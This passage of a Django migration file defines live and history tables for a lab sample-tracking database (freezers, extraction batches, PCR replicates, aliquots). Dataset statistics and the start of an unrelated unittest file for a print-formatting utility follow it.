('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezerlocation_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_freezerlocation',
'unique_together': {('freezer', 'rack', 'box', 'row', 'spot')},
},
),
# History table for Freezer (capacity counts: racks/boxes/rows/spots).
migrations.CreateModel(
name='FreezerHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('racks', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('boxes', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('rows', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spots', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical freezer',
'db_table': 'lili_freezerhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# History table for FinalSampleMeanConcentration (per sample+target value).
migrations.CreateModel(
name='FinalSampleMeanConcentrationHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('final_sample_mean_concentration', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
('target', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Target')),
],
options={
'verbose_name': 'historical final sample mean concentration',
'db_table': 'lili_finalsamplemeanconcentrationhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# History table for FinalConcentratedSampleVolume. The volume uses
# MinValueValidator(1E-100), i.e. strictly positive (zero not allowed).
migrations.CreateModel(
name='FinalConcentratedSampleVolumeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('final_concentrated_sample_volume', models.DecimalField(decimal_places=100, max_digits=120, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('notes', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('concentration_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ConcentrationType')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical final concentrated sample volume',
'db_table': 'lili_finalconcentratedsamplevolumehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Live FinalConcentratedSampleVolume table: one-to-one with Sample (each
# sample has at most one FCSV row; deleting the sample deletes it).
migrations.CreateModel(
name='FinalConcentratedSampleVolume',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('final_concentrated_sample_volume', models.DecimalField(decimal_places=100, max_digits=120, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('notes', models.TextField(blank=True)),
('concentration_type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='finalconcentratedsamplevolumes', to='liliapi.ConcentrationType')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalconcentratedsamplevolume_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalconcentratedsamplevolume_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='finalconcentratedsamplevolume', to='liliapi.Sample')),
],
options={
'db_table': 'lili_finalconcentratedsamplevolume',
},
),
# History table for FilterType (name + matrix FK).
migrations.CreateModel(
name='FilterTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('matrix', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Matrix')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical filter type',
'db_table': 'lili_filtertypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
# Deferred FKs on the live FilterType model, added once Matrix and the user
# model references are available in the migration state.
migrations.AddField(
model_name='filtertype',
name='matrix',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='filtertypes', to='liliapi.Matrix'),
),
migrations.AddField(
model_name='filtertype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='filtertype_modifier', to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='FieldUnitHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('table', models.CharField(max_length=64)),
('field', models.CharField(max_length=64)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('unit', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
],
options={
'verbose_name': 'historical field unit',
'db_table': 'lili_fieldunithistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ExtractionMethodHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical extraction method',
'db_table': 'lili_extractionmethodhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ExtractionMethod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionmethod_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionmethod_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_extractionmethod',
},
),
migrations.CreateModel(
name='ExtractionBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('re_extraction_notes', models.TextField(blank=True)),
('extraction_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('extraction_date', models.DateField(db_index=True, default=datetime.date.today)),
('pcr_date', models.DateField(db_index=True, default=datetime.date.today)),
('qpcr_template_volume', models.DecimalField(decimal_places=10, default=6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('sample_dilution_factor', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('qpcr_reaction_volume', models.DecimalField(decimal_places=10, default=20, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('ext_pos_dna_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_dna_invalid', models.BooleanField(default=True)),
('inh_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('analysis_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_method', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionMethod')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('inh_pos_nucleic_acid_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.NucleicAcidType')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('re_extraction', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
],
options={
'verbose_name': 'historical extraction batch',
'db_table': 'lili_extractionbatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AddField(
model_name='extractionbatch',
name='extraction_method',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='extractionbatches', to='liliapi.ExtractionMethod'),
),
migrations.AddField(
model_name='extractionbatch',
name='inh_pos_nucleic_acid_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='liliapi.NucleicAcidType'),
),
migrations.AddField(
model_name='extractionbatch',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionbatch_modifier', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='extractionbatch',
name='re_extraction',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='extractionbatches', to='liliapi.ExtractionBatch'),
),
migrations.CreateModel(
name='ConcentrationTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical concentration type',
'db_table': 'lili_concentrationtypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='AnalysisBatchTemplateHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('target', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Target')),
],
options={
'verbose_name': 'historical analysis batch template',
'db_table': 'lili_analysisbatchtemplatehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='AnalysisBatchTemplate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatchtemplate_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatchtemplate_modifier', to=settings.AUTH_USER_MODEL)),
('target', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatchtemplates', to='liliapi.Target')),
],
options={
'db_table': 'lili_analysisbatchtemplate',
},
),
migrations.CreateModel(
name='AnalysisBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('analysis_batch_description', models.CharField(blank=True, max_length=128)),
('analysis_batch_notes', models.CharField(blank=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical analysis batch',
'db_table': 'lili_analysisbatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='AliquotHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('aliquot_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('frozen', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('freezer_location', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.FreezerLocation')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical aliquot',
'db_table': 'lili_aliquothistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AlterUniqueTogether(
name='pcrreplicatebatch',
unique_together={('extraction_batch', 'target', 'replicate_number', 're_pcr')},
),
migrations.CreateModel(
name='PCRReplicate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('replicate_concentration', models.DecimalField(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('invalid', models.BooleanField(default=True)),
('concentration_unit', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicates', to='liliapi.Unit')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicate_creator', to=settings.AUTH_USER_MODEL)),
('invalid_override', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicates', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicate_modifier', to=settings.AUTH_USER_MODEL)),
('pcrreplicate_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicates', to='liliapi.PCRReplicateBatch')),
('sample_extraction', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicates', to='liliapi.SampleExtraction')),
],
options={
'db_table': 'lili_pcrreplicate',
'unique_together': {('sample_extraction', 'pcrreplicate_batch')},
},
),
migrations.AlterUniqueTogether(
name='inhibition',
unique_together={('sample', 'extraction_batch', 'nucleic_acid_type')},
),
migrations.CreateModel(
name='FinalSampleMeanConcentration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('final_sample_mean_concentration', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalsamplemeanconcentration_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalsamplemeanconcentration_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='finalsamplemeanconcentrations', to='liliapi.Sample')),
('target', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='finalsamplemeanconcentrations', to='liliapi.Target')),
],
options={
'db_table': 'lili_finalsamplemeanconcentration',
'ordering': ['sample', 'id'],
'unique_together': {('sample', 'target')},
},
),
migrations.CreateModel(
name='FieldUnit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('table', models.CharField(max_length=64)),
('field', models.CharField(max_length=64)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='fieldunit_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='fieldunit_modifier', to=settings.AUTH_USER_MODEL)),
('unit', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='fieldunits', to='liliapi.Unit')),
],
options={
'db_table': 'lili_fieldunit',
'unique_together': {('table', 'field')},
},
),
migrations.AlterUniqueTogether(
name='extractionbatch',
unique_together={('analysis_batch', 'extraction_number', 're_extraction')},
),
migrations.CreateModel(
name='Aliquot',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('aliquot_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('frozen', models.BooleanField(default=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='aliquot_creator', to=settings.AUTH_USER_MODEL)),
('freezer_location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='aliquots', to='liliapi.FreezerLocation')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='aliquot_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='aliquots', to='liliapi.Sample')),
],
options={
'db_table': 'lili_aliquot',
'unique_together': {('sample', 'aliquot_number')},
},
),
]
| 81.846535
| 223
| 0.648415
| 14,126
| 132,264
| 5.856506
| 0.02145
| 0.044096
| 0.043322
| 0.068078
| 0.929323
| 0.922941
| 0.913549
| 0.908098
| 0.904979
| 0.899539
| 0
| 0.010199
| 0.206027
| 132,264
| 1,615
| 224
| 81.897214
| 0.777592
| 0.000348
| 0
| 0.733209
| 1
| 0
| 0.160941
| 0.036478
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004975
| 0
| 0.007463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6eb0856ff37a9b81b52a7dda960ea391bf619e06
| 10,251
|
py
|
Python
|
test/utilities/test_print_formatter.py
|
thomaspenin/orchid-font-tool
|
c064a5ddd582393e462fd7411eae250944a6f7e5
|
[
"MIT"
] | null | null | null |
test/utilities/test_print_formatter.py
|
thomaspenin/orchid-font-tool
|
c064a5ddd582393e462fd7411eae250944a6f7e5
|
[
"MIT"
] | null | null | null |
test/utilities/test_print_formatter.py
|
thomaspenin/orchid-font-tool
|
c064a5ddd582393e462fd7411eae250944a6f7e5
|
[
"MIT"
] | null | null | null |
import unittest
from src.utilities.print_formatter import PrintFormatter
from src.utilities.print_formatter import Color;
class PublicPrintFormatter(PrintFormatter):
"""Public class to test PrintFormatter private methods"""
def __init__(self, arg):
super(PublicPrintFormatter, self).__init__()
self.arg = arg
@staticmethod
def public_remove_format_marks(str):
return PrintFormatter._remove_format_marks(str)
@staticmethod
def public_remove_line_breaks(str):
